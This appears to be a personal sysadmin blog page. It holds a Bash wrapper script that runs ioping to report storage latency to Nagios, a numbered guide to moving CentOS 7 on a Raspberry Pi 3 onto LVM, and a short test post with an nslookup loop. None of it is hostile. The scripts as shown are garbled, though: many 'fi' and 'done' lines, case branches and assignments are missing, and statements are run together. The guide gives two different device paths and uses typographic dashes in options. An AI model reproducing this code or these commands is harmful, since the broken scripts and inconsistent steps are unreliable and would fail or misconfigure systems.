I needed a way to track I/O latency on a VM hypervisor node (ovirt) because one ovirt node of 3 kept reporting latency to storage but it was the only one reporting it (and guaranteed not a config issue). I set this up in nagios to run every minute and run for 15 runs which is usually ~15 seconds

This is what it looks like inside NagiosXI


#!/usr/bin/env bash

# Wrapper script for ioping. Can be implemented in to a cron
# job or as an NRPE command for nagios. Use --nagios-perfdata to generate perfdata
# for Nagios to consume
# I needed a way to track I/O latency on a VM hypervisor node (ovirt)
# because the ovirt engine kept reporting latencies but it was the only one
# reporting it (and guaranteed not a config issue). I set this up in nagios 
# to run every minute and run for 15 runs which is usually ~15 seconds
# It is suggested to first get a baseline for what your system looks like by
# running the script with all zeros for crit/warn then using "raw data" line 
# to generate some  values you consider warn/critical. I used a 
# count of 120 (2 minutes) then min/max/avg * 1.5 for warning and * 2.5 for critical
#	* While running this I did the following on my home directory
#		while [ true ]; do ls -alhtrR $HOME; done
#	to generate some I/O without using DD, figured all the stat() calls would be
#	better geared towards real use 
# Example:
#	./iomonitor --directory /tmp --min-warn 0 --min-crit 0 --max-warn 0 --max-crit 0 --avg-warn 0 --avg-crit 0 --count 120

# Check dependencies
if [ -z $(command -v ioping) ]; then
	echo "* ERROR: Cannot find ioping command"
	exit 254

if [ -z $(command -v bc) ]; then
	echo "* ERROR: Cannot find bc command"
	exit 254

# This prints when using the -v flag
function debug_write() {
        if [ ${dbg} ]; then
                echo "* $@"

# Collect arguments
	while [ "$1" != "" ]; do
    		case $1 in



			"-c" | "--count" )
      			"-d" | "--directory")
			"-v" | "--verbose")


setargs "$@"

# Startup
debug_write "min_warn=${min_warn}"
debug_write "min_crit=${min_crit}"
debug_write "max_warn=${max_warn}"
debug_write "max_crit=${max_crit}"
debug_write "avg_warn=${avg_warn}"
debug_write "avg_crit=${avg_crit}"
debug_write "count=${count}"
debug_write "directory=${directory}"

# If count is empty, default to 15
if [ -z ${count} ]; then

# Move in to the directory for ioping to run
cd "${directory}"
if [ ${cdres} -ne 0 ]; then
	echo "* ERROR: Failed to CD to ${directory} to run ioping test. Exiting"
	exit 254

# Stuff
debug_write "Current directory - $(pwd)"

# Run ioping
debug_write "Running ${count} times"
cmd=$(ioping -c ${count} .)

# --verbose
debug_write "output: ${cmd}"

# Grep the line we care about
line=$(echo "${cmd}" | grep "^min/avg/max/mdev" )
debug_write "line: '${line}'"

# Now awk the fields out
data_lines=$(echo "${line}" | awk '{ print $3 " " $4 "\n" $6 " " $7 "\n" $9 " " $10 "\n" $12 " " $13 };')

# Array for data parsing
declare -a data

# Conversions
IFS=$(echo -en "\n\b")
for i in $(echo "${data_lines}"); do
	# TODO: Make what to convert to an argument
	# we default now to seconds. People may want to monitor at ms level
	#... but I suck at math

	value=$(echo "$i" | cut -d ' ' -f1)
	unit=$(echo "$i" | cut -d ' ' -f2)
	case "${unit}" in
			echo "* ERROR: Received unit we could not convert. Got ${unit}"
			exit 245

	debug_write "(${unit}) - ${value} * ${conversion}"
	converted=$(echo "scale=6; ${value} * ${conversion}" | bc | awk '{printf "%f", $0}')


debug_write "Converted to seconds: $min / $avg / $max / $mdev"

# now check warn/crit

# Because im lazy and using a function is prettier
function append() {

function perfdata_append() { 
	perfdataoutput="${perfdataoutput}$@ "

# Use BC to do float comparison
function comp() { 
	bc <<< "$@" return $? } # Iterate the fields we need. Doing it this way avoids repeat code # Why repeat code when we can use bashes flexibility?! for i in $(echo min max avg); do # Yay bash variable substitution! # use the value when we need to and the variable name when we need to # ex: ${idx_name} would expand to min then $idx_warn would expand to min_warn # so when we use ${!idx_warn} it would expand to min_warn value (the arg input field) idx_inner_val="${!i}" idx_name="$i" idx_warn="${idx_name}_warn" idx_crit="${idx_name}_crit" debug_write "${idx_inner_val} > ${!idx_warn}" 
	debug_write "${idx_inner_val} < ${!idx_crit}" if [ $(comp "${idx_inner_val} > ${!idx_warn}" ) -eq 1 ] && [ $(comp "${idx_inner_val} < ${!idx_crit}" ) -eq 1 ]; then append " * WARNING: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_warn}\n"
	if [ $(comp "${idx_inner_val} > ${!idx_crit}" ) -eq 1 ]; then
	        append " * CRITICAL: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_crit}\n"

	perfdata_append "${idx_name}=${idx_inner_val}"


# May as well print the raw data when we print anything else or the OK
append "raw data: ${line}"

# Warn / crit / OK logic 

# Crit
if [ ${exit_crit} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
		echo -e " | ${perfdataoutput}"
	exit 2

# Warn
if [ ${exit_warn} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
                echo -e " | ${perfdataoutput}"
	exit 1

# Else OK 
echo -e "OK - ${directory} latency - ${output}" | tr -d '\n'
if [ ! -z "${perfdata}" ]; then
	echo -e " | ${perfdataoutput}"

exit 0

Moving CentOS 7 to LVM on Raspberry Pi 3 / ARMv7L

I will formalize this later when I can

  1. This is purely assuming you’re using CentOS 7 on RPI3 and have DD’ed the image per their installation instructions. This assumption will lead the below
  2. Confirm your version has support via CONFIG_BLK_DEV_INITRD kernel compile option. You can check /proc/config.gz for this..if you dont have it then modprobe configs
  3. Generate an initrd – dracut -f -v /boot/initrd $(uname -r)
  4. Append ‘initramfs initrd 0x01f00000’ to /boot/config.txt
  5. Modify /boot/cmdline.txt to read initrd=0x01f00000 after root=/dev/…. and before rootfstype=ext4
  6. Reboot as a test. Note that your boot time will go from about 5-10 seconds to upwards of a minute or so. You will see the Raspberry Pi splash screen for about 5 seconds as opposed to .5 or 1 second before. This is because the Pi now needs to load the 26MB initrd in to memory before continuing
  7. If it comes back up then you can move the file system now
  8. Edit /etc/fstab and change noatime for / to be ro,noatime
  9. Reboot
  10. yum install -y lvm2
  11. fdisk /dev/mmcblk0
  12. Create a new partition and exit
  13. Reboot
  14. pvcreate /dev/mmcblk0p4
  15. vgcreate root /dev/mmcblk0p4
  16. lvcreate –name=”lv_root” -l 45%FREE root <—- more on this later
  17. mkdir /mnt/new
  18. mount /dev/mapper/root/lv_root /mnt/new
  19. Copy the file system: tar -cvpf – –one-file-system –acls –xattrs –selinux / | tar xpf – -C /mnt/new/
  20. Edit /boot/cmdline.txt root= to be root=/dev/mapper/root-lv_root
  21. Reboot


Test Post

Please ignore


 * Insert your code here
 #!/usr/bin/env bash
 for i in $(echo "${LIST}"); do
	IP=$(nslookup $i | grep -iv | grep -i address | cut -d ":" -f2 | tr -d '\r' | xargs echo)
	if [ -z ${IP} ]; then
	echo "$i,${IP}"